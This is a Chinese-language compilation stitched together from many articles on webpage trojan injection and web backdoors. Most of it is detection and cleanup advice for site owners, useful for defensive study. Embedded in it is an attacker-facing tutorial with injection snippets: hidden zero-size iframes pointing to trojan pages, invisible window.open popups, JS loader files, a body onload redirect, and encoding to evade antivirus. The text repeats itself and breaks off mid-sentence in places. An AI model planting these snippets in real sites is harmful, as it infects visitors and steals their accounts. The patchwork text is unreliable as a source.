解析网页后门与网页挂马

网站挂马检测1. 简介在网络世界中，网站被黑客植入恶意挂马代码是一种很常见的攻击手段。

恶意挂马代码是指黑客将一段具有恶意功能的代码嵌入到网站的页面中，当用户访问被感染的页面时，恶意代码就会被执行，从而导致用户的计算机受到攻击。

为了保障网站和用户的安全，需要进行网站挂马检测。

2. 网站挂马检测的重要性挂马攻击会造成严重的后果，例如：•网站内容被恶意篡改，影响网站的正常运行和用户体验。

•用户计算机被感染，个人信息和敏感数据被窃取。

•网站被搜索引擎标记为不安全网站，导致排名下降和用户流失。

因此，网站挂马检测变得至关重要，通过定期检测可以及早发现潜在的挂马问题，以便采取相应的措施进行修复和保护。

3. 网站挂马检测的方法3.1 定期漏洞扫描每个网站都存在不同程度的漏洞，黑客可以利用这些漏洞进行挂马攻击。

定期进行漏洞扫描是一种常见的网站挂马检测方法。

漏洞扫描工具可以扫描网站的各种漏洞，并生成报告，报告中会列出潜在的挂马漏洞，以便管理员进行修复。

3.2 文件完整性检查网站的核心文件和脚本文件是黑客常常利用的目标。

通过定期检查这些文件的完整性，可以及早发现是否被篡改。

如果发现文件的MD5值或哈希值与原始文件不匹配，就可能存在被挂马的风险。

3.3 网络流量监控黑客常常通过网络流量进行挂马攻击。

建立网络流量监控系统可以及时发现异常的网络流量，并分析其源头，从而及早发现潜在的挂马攻击。

3.4 第三方工具和服务还可以借助第三方工具和服务进行网站挂马检测，例如腾讯云的云安全服务、百度安全管家等。

这些工具和服务通常具有专业的漏洞扫描功能，可以帮助管理员及时发现并解决潜在的挂马问题。

4. 挂马检测的预防措施除了进行定期的挂马检测，还需要采取一些预防措施来降低被挂马的风险。

•定期更新和升级网站的核心文件和脚本，避免利用已知的漏洞进行攻击。

•使用安全的密码和账户管理策略，避免被黑客猜测或破解密码。

•配置良好的防火墙和入侵检测系统，及时阻止异常的访问和攻击。

• 23•网页挂马是一种常见的网络攻击方式，对网络信息安全构成威胁。

黑客通过各种手段获取管理员账号，登陆并修改页面内容。

网页挂马检测技术，可以避免恶意网页的危害,保护用户利益。

本文对网页挂马技术做出概述，基于Python网络爬虫进行抓取，对抓取内容进行漏洞分析，深入研究web网页应用漏洞原理、检测方法。

1 引言web网页挂马指的是把一个木马程序上传到一个网站,然后用木马生成器生成一个网马，最后反传回空间。

黑客通过SQL注入，敏感文件的扫描，程序0day等方式获得网站管理员的账号，登陆网站的后台，目的是通过数据库备份与恢复或者上传某个漏洞获得一个webshell。

通过获得的webshell在网页上进行修改，也可以在页面中加入恶意HTML代码。

也可以直接通过弱口令来获取FTP，可直接对网站的页面进行修改（刘洁，我国网页篡改及挂马检测技术专利分析：中国科技信息，2018）。

web网页一旦被挂马就面临着安全问题，检测技术至关重要。

检测技术有如下三种：（1）特征匹配。

将网页挂马的脚本按脚本病毒处理进行检测。

（2）主动防御。

浏览器创建某项任务，被提问是否运行时，多数用户会选择是，网页木马因此被植入，这就是典型的网页挂马现象。

（3）脚本行为分析。

通过浏览器等主机的行为动作来判断网页是否含有木马。

本文是基于Python语言实现网络爬虫对网页进行漏洞检测，需要建立特征知识库匹配URL信息，本文主要研究特征匹配检测技术，将网页的源码进行特征值匹配，检测是否存在漏洞。

本文研究内容也是网络安全研究的热点之一。

2 网页挂马技术网页挂马是在可编辑文件中，或HTML代码头部中加入一段代码，来实现跳转到另一个网站，访问指定的HTML，然后通过漏洞攻破系统下载木马，进而隐藏下载木马并运行。

下面介绍几种网页挂马方式：（1）js文件挂马将js脚本的代码写在网页中，访问者在浏览网页时，恶意代码会通过主机打开网页木马的窗口，潜伏运行。

首先将以下代码document.write(“<iframe width=’0’ height=’0’src=’http //www.baidu/muma.htm’></iframe>”);保存为xxx.js，则js文件代码为<script language=javascript src=xxx.js></script>（2）body挂马body挂马可以在打开正常页面地址的时候，自动跳转到网马页面。

网页挂马之实战详解不论是那一种帮凶，黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下，顺利将木马保存到被黑电脑中然后运行，经过多年的演变与发展，目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页)，当被黑者浏览这个网页，就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞，此方法当然就无效)。

一般而言黑客想要利用漏洞来进行黑客任务，几乎都必须自己写工具程序才行，不过在黑客的世界中永远有奉献出自己心力的慈善家，因此网络上就有一些针对某些漏洞而设计的木马生成器，让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务，在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。

由于这类工具是帮助真正的木马植入被黑电脑中与运行，因此应该称为木马帮凶，而不是真正的木马，因此严格来说它应该是木马帮凶生成器，而不是木马生成器，像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。

◎木马帮凶生成器的问题与盲区可能有读者会认为：既然有现成的工具，那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆，的确没错，虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地)，但是有经验黑客并不会因此而高兴，因为这些木马帮凶生成器的问题很多，并非找到后下载就能顺利使用，主要有下列问题：．虽然在查找网站中有找到，但单击后该网页已经不见了，当然也就不可能下载木马帮凶生成器，这种情况很常见，只好再试下一个查找到的项目。

．有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的，就算下载后可以正常使用，但对于已修补该漏洞的电脑当然就无效，也就是说年代愈久，木马生成器愈没有利用的价值 (对许多电脑可能都无效)，因此这类木马查找到一大堆也几乎是废物。

∙∙当前位置 : 主页 > 网络安全 > 黑客教程 >网页挂马详细步骤教程来源：互联网作者：佚名时间：04-30 13:19:33【大中小】点评：其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。

下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单的了，只要你懂点html语言把下面这段代码插进网页中：其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。

下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单的了，只要你懂点html语言把下面这段代码插进网页中：<iframe src="这里换成你的网马的地址" width="0" height="0"frameborder="0"></iframe>我来插入，理论上来说插到任何地方都行，只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样，不知道网易那里有没有弹出的广告了，好我们运行，注意到网页的左下角的网址变化看到左下角了吧，那里在请求，说明我们插入进去的页面也运行了，哦，还有个弹出的窗口，给我的工具拦了，我来刷新一次，看到吧width="0" height="0" frameborder="0"就是大小高度的意思，我们把他设置为零，那我们就不能看到网页的内容了看下一种方法，把原来插进去的清理掉先，等下那个文件还要用方法二：这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做网页的时候就会加入很多网页特效，同样我们也可以用来打开我们的网马，那么浏览过机子就会中我们的网马了～学过java的都知道上面一段代码的意思了把！打开网站的同时也就打开了我们的/test.htm看我们插进去弹出的窗口给拦了，我去掉先，还是给拦了晕，有个窗口弹了出来，这样子的网马是不保险的……不过也不失为一种方法呃～改成0就更大的窗口了，好，方法而已，只是介绍，下一个方法三：还有一点就是比较隐蔽的那就是使用js文件document.write("<iframe width='0' height='0'src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0'src='/mm2.htm'></iframe>");我们没必要挂两个网马，就写一个好了额刚才写错位置了保存为mm.js，然后在首页里调用js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调用的代码，从这里我们可以看到/mm.js，说明我们的mm.js 文件可以不传到主机上，这样可以方便我们批量管理我们挂马，传到我们的主页空间上就可以了不过我这里就不传了，就用本地的吧，运行左下角……调用了163的了，再刷新下，看清楚点，OK下一种方法方法五：再一种代码就是调用其他网页的页面文件,可以将下面的代码复制，保存为HTM文件。

网页后门木马扫描系统的设计和实现的原理1 简介网页后门木马其实就是一段网页代码，主要以asp、jsp、php 代码为主。

由于这些代码都运行在服务器端，攻击者通过这段精心设计的代码，在服务器端进行某些危险的操作，获得某些敏感的技术信息或者通过渗透，提权获得服务器的控制权。

并且这也是攻击者控制服务器的一条通道，比一般的入侵更具有隐蔽性。

网页挂马就是攻击者通过在正常网站的页面中插入一段代码。

浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。

2 网页后门木马的类型2.1 框架嵌入式网页挂马网页木马被攻击者利用iframe 语句，加载到任意网页中都可执行的挂马形式，是最早也是最有效的的一种网络挂马技术[1]。

通常的挂马代码“<iframe src='实际木马地址' width=0height=0></iframe>”，用户访问该页面时会自动跳转到实际木马页面运行木马程序。

2.2 js 调用型网页挂马此类网页挂马是一种利用javascript 脚本文件调用的原理进行的网页木马挂马技术，比如将代码“document.write("<iframe width='0' height='0'src='实际木马地址'></iframe>");”保存为a.js，则js 调用型网页挂马代码为“<script language=javascript src=a.js></script>”，用户访问该页面时会调用a.js 运行远程木马。

2.3 图片伪装型网页挂马攻击者利用图片作为转移网页访问者视线的一种方式，将代码插入目标网站内页或另存为HTML 再上传到目标网站，当用户访问该网页时，就会中招[2]。

以上只是列出了三种最常见的网页挂马方式[3]，但随着时间的推移，这些挂马方式将会演变成各种各样的形态，旨在盗取不同的机密或链接恶意木马页面。

如何检测网站是否被挂马
站长最头疼的一件事大概就是网站被挂马了吧！网站被挂马就说明网站的权限很可能已经落入到了其他人的手上，就好比这个网站里有什么都可能被别人知道，网站挂马还会给网站打来巨大的负面影响比如内容被篡改，用户体验变差，严重的可能还会发生企业机密数据泄露等风险，那么对于一个网站如何才能检测出是否被挂马了呢？
1、看网站打开首页是否会自动跳转到陌生页面，一般来说网站被挂马最明显的特征就是网站是否存在跳转到其网站链接，如果我们在用浏览器打开自己网站的时候发现网站突然跳转到陌生的页面，那么这个时候就要想一想是不是网站被挂马了。

可以通过手动检查的方式来常看网站源码，可以通过查找命令查看网以http开头是不是存在自己的链接。

如果源码中出现不是自己网站的链接也不是广告链接的话，站长就应该及时处理挂马了。

2、FTP
坑一通过FTP来参看服务器内文件是否有被修改，如果是网站被挂马而且黑客修改了网站文件，那么相应的文件修改时间也会发生变化，所以要是某些文件的修改时间比其他文件要晚，就说名可能该文件以及被黑客修改过了，也就是说网站以及被挂了木马了。

3、后台进不去
后台是方面管理员进行操作的，要是网站后台进不去，或者没有权限说明后台可能被篡改，也说明网站被挂了马。

4、查看网站收录
可以使用site命令来site一下网站，要是在搜索结果中发现有大量不属于网站的内容，就说明网站可能被挂了马。

有没有什么办法来预防呢
推荐使用一些在线检测挂马的工具，站长工具里也有。

还有就是ftp的用户期限要尽量最小化，重要的文件可以定期的检查是否被修改等等。

---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一，在 2008 年到2010 年间，网页挂马攻击更是成为了黑客最主要的攻击手段。

根据瑞星云安全系统监测， 2008 年到 2010 年间，客户端受到恶意网马的年攻击次数达到千万级别。

虽然近两年来，网络钓鱼攻击已经在数量上超越了网页挂马攻击，但是网页挂马攻击所带来的危害依然巨大，不仅对网站的安全运行造成威胁，对客户端用户来说，网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。

常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后，在网站的页面中插入一些代码，当浏览者访问到这些包含有恶意代码的网页时，就会在不知不觉中执行相应的漏洞利用程序。

这些程序可以在浏览者的电脑上下载并执行木马程序，导致浏览者的电脑成为黑客的肉鸡。

挂马操作可以有多种方式实现，以下是比较常见的几种挂马攻击手段。

1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架，在访问网页时，从网页表面是无法通过肉眼看到这个框架的，只能通过网页源码分析或抓包的方式查看到相应的数据信息。

1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中，同时恶意篡改网站文件中的 JS 文件代。

一般来讲，那些被全站引用的 JS 代码最容易被黑客挂马。

3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理，黑客通过加密代码的方式隐藏了该信息。

4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的，当用户访问挂有以上代码的网页时，页面就会自动跳转去执行黑客指定的恶意页面，从而导致挂在恶意页面的木马在本地被执行。

网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上，“网页挂马”是一个出现频率很高的词汇。

关于某些网站被挂马导致大量浏览用户受到攻击，甚至造成财产损失的新闻屡见不鲜。

而这些挂马事件总能和一些软件漏洞联系起来。

那么，什么是网页挂马？网页挂马和软件漏洞有什么联系？它的危害在什么地方，又该如何防御呢？本文结合攻防研究中的经验体会，将就这些问题进行探讨。

网页挂马简介什么是网页挂马要解释什么是网页挂马，要先从木马说起。

大家知道，木马是一类恶意程序，和其它的正常文件一样存在于计算机系统中。

这些恶意程序一旦运行，会连接到远处的控制端，使其享有恶意程序所在系统的大部分操作权限，例如给计算机增删密码，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等各种有害操作，而这些操作往往不被使用者察觉。

将木马与网页结合起来成为网页木马，表面看似正常的网页，当浏览者浏览该网页的同时也运行了木马程序。

网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞，自动下载已经放置在远端的恶意程序。

由于下载过程利用了软件上的漏洞，是非正常途径，不会被计算机系统或浏览器本身所察觉。

网页挂马指的是攻击者篡改了正常的网页，向网页中插入一段代码，当用户浏览网页的同时执行这段代码，将引导用户去浏览放置好的网页木马。

使用一些特别的技术可以使得这段代码的执行对用户来说不可见。

网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞，只要这些漏洞能够被利用并执行任意代码，那么存在漏洞的系统就有可能受到网页木马攻击。

网页挂马的技术门槛并不高，互联网上可以得到很多现成的攻击工具。

同时网页木马隐蔽性高，挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行，用户都无法察觉。

网页挂马的传播范围同被挂马网页的数量和浏览量成正比。

各种类型的网站都可以成为网页挂马的对象。

上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。

网站挂马及检测技术网站挂马与检测技术报告什么是挂马？所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。

利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。

也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。

当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。

网站挂马的危害危害和应用的普及程度有关，上网人人都会，也就是说，人人都可能中毒。

据金山毒霸安全实验室统计，每天有数百万次浏览与挂马网页有关，中毒概率在20%-50%之间。

很多游戏网站被挂马，黑客目的就是盗取浏览该网站玩家的游戏账号，而那些大型网站被挂马，则是为了搜集大量的肉鸡。

网站被挂马不仅会让自己的网站失去信誉，丢失大量客户，也会让我们这些普通用户陷入黑客设下的陷阱，沦为黑客的肉鸡。

如果不小心进入了已被挂马的网站，则会感染木马病毒，以致丢失大量的宝贵文件资料和账号密码，其危害极大。

挂马泛滥的原因利。

病毒木马黑色产业链有丰厚的利润，去年南京警方抓获的大小姐系列木马案，犯罪集团3个月获得非常收益3000万。

网络应用越普及，黑色产业链的从业者收益也就越高。

挂马范围哪些网站容易被挂马呢？越是流量高的网站对黑客越有吸引力，黑客攻破一个管理上有漏洞并且网站流量很高的网站，一天就可以感染数百万人。

那些与公共事业密切相关的网站，比如政府机关的网站，色情网站，视频网站，聊天交友网站，提供盗版软件破解工具的网站最容易被入侵，几乎每周出现的热点网络事件都被攻击者利用，网民一不小心就会受热门事件吸引中招。

这段代码就显得更加隐蔽，因为几乎95%的网页中都会出现类似的script 标签。

利用js引入网页木马也有多种方法：在js中直接写出框架网页木马示例代码如下：document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>")；指定language的属性为"JScript.Encode"还可以引入其他扩展名的js代码，这样就更加具有迷惑性，示例代码如下：<SCRIPT language="JScript.Encode" src=http://www. /mm.jpg></script>；利用js更改body的innerHTML属性，引入网页木马如果对内容进行编码的话，不但能绕过杀毒软件的检测，而且增加了解密的难度，示例代码如下：op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E'；利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下：<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menu bar=no,scrollbars=no,width=1,height=1"); </script>；利用URL欺骗示例代码如下：a href="(/迷惑用户的链接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的正常内容</a>：<SCRIPT Language="JavaScript">function www_163_com (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location =no,directories=no,status=no,menubar=no, scrollbars=no,resizable=no,copyhistory=ye s,width=800,height=600,left=10,top=10"); }</SCRIPT>3.body挂马使用如下代码，就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。

网站被挂马的解决途径有哪些？
网站被挂马的解决途径有哪些?
第一，降低网站文件夹权限
网站如果被挂马，第一时间可以将网站所在的文件夹权限更改至最低，也就是只保留读写权限，暂时关闭其他权限，这样只需要网站能够正常访问就可以了。

因为文件夹权限修改以后，黑客暂时就无法再次篡改网页，因此就防止了老问题没解决就出现新的问题。

但是如果是整台服务器都被黑，修改网站文件权限也是没有多少用处，这时需要对网站重新换空间。

第二，备份文件替换被挂马文件
文件夹权限修改后，就需要对挂马文件进行修改删除。

如果觉得麻烦，可以直接将之前备份的文件替换现在被挂马的文件。

为了确保可以替换每一个页面，可以先将空间清空后再上传，但是为什么要将空间清空呢?主要担心黑客可能上传自己的后门文件，如果这样的话，即使将文件替换也是没有多少作用的。

将空间清空既可以删除可能存在的后门文件，也可彻底替换每一个可能被挂马的页面，因此平时在维护网站的时候，学会对文件进行定期备份很有必要。

第三，帐号密码不能太过简单
账号密码主要包括空间FTP、网站后台以及数据库等涉及安全的账号密码，帐号密码设置时，切忌直接将域名作为账号与密码，最好可以大小写组合，不能全是数字，这样黑客破解起来非常容易。

帐号密码调整好以后再检查网站的.管理后台目录是否是默认的，如果是默认的类似admin这样的请做修改以防止黑客从后台入侵。

网站被挂马后，网站权重、流量、排名都会下降很多，对网站伤害是比较大的。

因此站长在平时工作中，需要定期对网站进行漏洞检查，或者查看网站源文件，并对网站后台设置好权限，只有这样网站才会有一个比较安全的状态。

为什么要网站挂马如今电脑病毒的种类越来越多了，那么你们知道网站为什么挂马吗?下面是店铺整理的一些关于网站挂马的相关资料，供你参考。

什么叫网站挂马?网站挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马，再上到空间里面!再加代码使得木马在打开网页时运行!作为网站挂马的散布者，其目的是将木马下载到用户本地，并进一步执行，当木马获得执行之后，就意味着会有更多的木马被下载，进一步被执行，进入一个恶性的循环，从而使用户的电脑遭到攻击和控制。

为达到目的首先要将木马下载到本地。

1.将木马伪装为页面元素。

木马则会被浏览器自动下载到本地。

2.利用脚本运行的漏洞下载木马3.利用脚本运行的漏洞释放隐含在网页脚本中的木马4.将木马伪装为缺失的组件，或和缺失的组件捆绑在一起(例如：flash播放插件)。

这样既达到了下载的目的，下载的组件又会被浏览器自动执行。

5.通过脚本运行调用某些com组件，利用其漏洞下载木马。

6.在渲染页面内容的过程中利用格式溢出释放木马(例如：ani格式溢出漏洞)7.在渲染页面内容的过程中利用格式溢出下载木马(例如：flash9.0.115的播放漏洞)网站挂马背景通过对近期网内检测到的623个被挂马网站所使用的Web服务程序类型以及编写网页所使用的脚本语言类型进行的统计分析：图脚本语言及服务程序类型分布统计从图中可以看出，被挂马网站使用最为广泛的是IIS服务，其次是Apche服务。

容易被挂马的多数是ASP编写的网页，而直接使用HTML的静态页面则相对安全。

是什么导致了IIS+ASP的服务组合容易被挂马?这需要从造成网站被挂马的原因说起。

网站挂马的产生原因1. 网站服务器的系统或应用程序存在安全漏洞导致网页被挂马所有的系统和应用软件都可能存在漏洞，各厂商会针对自己的产品定期发布安全公告和补丁程序，如果管理员疏于管理，不及时的安装补丁，就可能导致漏洞被攻击者利用从而篡改网页进行挂马。

Windows系统和Linux系统一样都会存在漏洞，但是由于Windows 系统的普及率及版本的通用性使得攻击者更热衷于去开发Windows底下的攻击程序，这就导致运行在Windows下的IIS+ASP的搭配更易受到攻击。

网页病毒及网页挂马原理所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。

利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。

下面是店铺跟大家分享的是网页病毒及网页挂马原理，欢迎大家来阅读学习。

网页病毒及网页挂马原理工具/原料web服务器方法/步骤实验环境如图5-68所示。

实验过程第1步：设置IP地址。

在Windows2003上，对本台电脑的网卡设置两个IP地址，如图5-69所示，目的是要在本台电脑上架设基于IP地址(218.198.18.93、218.198.18.95)的两个网站。

第2步：打开【Internet信息服务(IIS)管理器】。

在Windows2003上，打开【Internet信息服务(IIS)管理器】，如图5-70所示，右键单击【默认网站】选择右键菜单中的【属性】，如图5-71所示，为本网站选择的IP地址是218.198.18.93。

第3步：创建www_muma网站的主目录。

在Windows 2003上，在Inetpub文件夹中创建www_muma子文件夹，该文件夹是第4步新建网站的主目录。

wwwroot是默认网站的主目录。

第4步：创建网站。

在图5-70，右键单击【网站】，依次选择【新建】/【网站】菜单命令，如图5-72所示，开始创建网站，创建过程如图5-73～图5-76所示。

第5步：复制网站文件。

在Windows 2003上，读者可以将两个简单的网站文件(index.htm)分别复制到wwwroot和www_muma文件夹中。

编辑wwwroot文件夹中的index.htm文件，在该文件源代码的…之间插入如图5-77所示的被圈部分代码。

第6步：打开浏览器。

在Windows XP上，打开Firefox浏览器，地址栏输入218.198.18.93，结果如图5-78所示。

如何对网站挂马检测及清除
如何对网站挂马检测及清除
引导语：网站挂马的检测和清楚方法都有哪些呢？以下是小编整理的如何对网站挂马检测及清除，欢迎参考阅读!
1、百度网站安全检测工具
百度对网站安全检测工具进行了升级，新升级的工具可以检测出网站被黑的详细类别，包括挂马、钓鱼、欺诈、违规内容，同时还有针对这些被黑的`详细修复建议，让站长能够在最快速的时间里解决网站安全问题。

2、百度云观测
百度云观测是百度旗下的云服务产品，为站长提供7*24小时网站监测和报警服务，功能覆盖网站运行状况、安全性、访问速度等服务!
3、360网站安全检测
360网站安全检测属于360旗下的网站安全平台，主要为站长免费提供了网站漏洞检测、网站漏洞修复、网站后门检测、木马查杀，网址安全查询等服务。

4、安全联盟站长平台
安全联盟站长平台，是安全联盟唯一指定网站安全解决方案，主要提供网站漏洞检测检测，帮助网站解决网站被挂马、被篡改、被入侵等问题!。

专家教你如何进行网站挂马检测与清除不完全统计，90%的网站都被挂过马，挂马是指在获取网站或者网站服务器的部分或者全部权限后，在网页文件中插入一段恶意代码，这些恶意代码主要是一些包括IE等漏洞利用代码，用户访问被挂马的页面时，如果系统没有更新恶意代码中利用的漏洞补丁，则会执行恶意代码程序，进行盗号等危险超过。

目前挂马主要是为了商业利益，有的挂马是为了赚取流量，有的是为了盗取游戏等账号，也有的是为了好玩，不管是处于那种目的，对于访问被挂马的网站来说都是一种潜在的威胁，影响运营网站公司形象。

当一个网站运营很长时间后，网站文件会非常多，手工查看网页文件代码非常困难，杀毒软件仅仅对恶意代码进行查杀，对网页木马以及挂马程序不一定全部查杀，本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨，使用本文提及的工具可以很轻松的检测网站是否被挂马。

(一)检测挂马页面1.安装urlsnooper软件Urlsnooper是一款URL嗅探工具，其官方主页地址为：，目前已经不提供免费下载了，可以到-11525.html下载该软件。

安装非常简单，按照提示进行安装即可。

第一次使用时需要程序会自动检查网卡，查看能否正常连接网络，设置正确无误后，应该出现如图1所示的画面。

图1安装正确后的界面2.对网站进行侦测在Urlsnooper中的“ProtocolFilter”中选择“ShowAll”，然后单击“SniffNetwor k”按钮开始监听网络。

接着使用IE浏览器打开需要进行检测木马的网站，Urlsnooper会自动抓取网站中的所有连接，在Index中按照五位数字序号进行排列，如图2所示。

图2监听结果说明：在侦测结果中可能包含的连接地址非常多，这个时候就需要进行排查，可以选中每一个记录，Urlsnooper会在下方中显示详细的监听结果，如图2所示，就发现存在一段挂马代码：在百度搜索中对其进行搜索，如图3所示，有30多项搜索结果，从查询结果可以辅佐证明该段代码为挂马代码。

网站被挂马，被植入后门，这是管理员们无论如何都无法忍受的。

Web服务器被攻克不算，还“城门失火殃及池鱼”，网站的浏览者也不能幸免。

这无论是对企业的信誉，还是对管理员的技术能力都是沉重的打击。

下面笔者结合实例对网页后门及其网页挂马的技术进行解析，知己知彼，拒绝攻击。

一、前置知识网页后门其实就是一段网页代码，主要以ASP和PHP代码为主。

由于这些代码都运行在服务器端，攻击者通过这段精心设计的代码，在服务器端进行某些危险的操作，获得某些敏感的技术信息或者通过渗透，提权获得服务器的控制权。

并且这也是攻击者控制服务器的一条通道，比一般的入侵更具有隐蔽性。

网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。

浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。

二、网页挂马的类型1、框架嵌入式网络挂马网页木马被攻击者利用iframe语句，加载到任意网页中都可执行的挂马形式，是最早也是最有效的的一种网络挂马技术。

通常的挂马代码如下：<iframe src=/muma.html width=0 height=0></iframe>解释：在打开插入该句代码的网页后，就也就打开了/muma.html页面，但是由于它的长和宽都为“0”，所以很难察觉，非常具有隐蔽性。

下面我们做过做个演示，比如在某网页中插入如下代码：<iframe src= width=200 height=200></iframe>在“百度”中嵌入了“IT168安全版块”的页面，效果如图1。

(图1)2、js调用型网页挂马js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术，如：黑客先制作一个.js文件，然后利用js代码调用到挂马的网页。

通常代码如下：<script language=javascript src=/gm.js></script>/gm.js就是一个js脚本文件，通过它调用和执行木马的服务端。

如何对网站挂马检测及清除挂马是指黑客在网站上植入恶意代码，以达到非法获取用户信息、传播病毒等目的。

对于网站管理员来说，及时发现并清除挂马是非常重要的。

本文将介绍如何对网站进行挂马检测及清除的方法。

1. 挂马检测挂马检测是指通过一系列方法来发现网站是否被植入了恶意代码。

以下是一些常用的挂马检测方法：1.1 主动扫描使用主动扫描工具，如在线漏洞扫描器或安全审计工具，对网站进行扫描，以寻找潜在的漏洞，从而发现是否存在挂马。

1.2 文件监控定期监控网站文件的变化，尤其是关键文件（如网页文件、脚本文件等）的变化。

如果发现文件被修改或新增，就需要对该文件进行进一步的检查。

1.3 日志分析分析网站的访问日志，查看是否有异常的访问行为或异常的URL请求。

通常，黑客在植入恶意代码后，需要通过某种方式访问该代码，日志分析可以帮助我们识别这些异常行为。

1.4 网络监控使用网络监控工具，实时监控网站的入侵行为。

这些工具能够检测到网站是否遭受到DDoS攻击、SQL注入攻击等，这些攻击可能导致网站被挂马。

2. 挂马清除一旦发现网站存在挂马，需要及时清除恶意代码，以保障网站的安全性。

以下是一些常用的挂马清除方法：2.1 备份网站在进行挂马清除之前，务必对整个网站进行备份，以防止意外操作导致网站数据丢失。

2.2 手动清除首先，在清除挂马之前，需要对网站服务器进行全面的杀毒扫描，确保没有其他恶意文件存在。

然后，通过查找恶意代码文件并将其删除，以清除挂马。

2.3 使用安全工具可以使用一些安全工具来帮助清除挂马。

例如，使用杀毒软件对服务器进行全面扫描，找出并删除恶意文件。

使用网站安全监测服务，扫描网站并提供清除恶意代码的建议。

2.4 更新和修复漏洞挂马通常是因为网站存在安全漏洞而被黑客利用，因此，在清除挂马后，务必及时更新和修复网站的漏洞。

这包括及时升级网站的CMS、插件、主题等软件，并修复可能存在的SQL注入、XSS等漏洞。

2.5 监控网站安全清除挂马只是第一步，为了保障网站的安全，还需要定期监控网站的安全性。

网络后门和网页木马实验三网络后门和网页木马【实验目的】理解后门的定义与分类；掌握后门的操作与原理；剖析网页木马的工作原理；理解木马的植入过程；学会编写简单的网页木马脚本；通过分析监控信息实现手动删除木马。

【实验人数】每组2人【系统环境】Windows 【网络环境】交换网络结构【实验工具】灰鸽子木马；监控器工具；JlcssShell；网络协议分析器【实验原理】最早的后门是由系统开发人员为自己留下入口而安装的，而今天，并非开发人员将后门装入自己设计的程序中，而是大多数攻击者将后门装入他人开发和维护的系统中。

通过使用这样的后门，攻击者可以很轻松地获得系统的访问权，进而获得系统的控制权。

为了更加明确，我们给出后门的以下定义：后门是一个允许攻击者绕过系统中常规安全控制机制的程序，它按照攻击者自己的意愿提供通道。

后门的作用在于为攻击者进入目标计算机提供通道。

这个通道可能表现为不同形式，它取决于攻击者的目的和所使用的特定后门类型。

后门能够为攻击者提供许多种不同类型的访问，包括以下几种：本地权限的提升：这类后门使得对系统有访问权的攻击者突然变换其权限等级成为管理员，有了这些超级用户权限，攻击者可以重新设置系统或访问任何存储在系统中的文件。

单个命令的远程执行：利用这种类型的后门，攻击者可以向目标计算机发送消息。

每次执行一个单独的命令，后门执行攻击者的命令并将其输出返回给攻击者。

远程命令行解释器访问：正如我们所知的远程shell命令，这种类型的后门允许攻1击者通过网络快递直接地键入受害计算机的命令提示。

攻击者可以利用命令行解释器的所有特征，包括执行一个命令集合的能力编写脚本，选择一些文件进行操作。

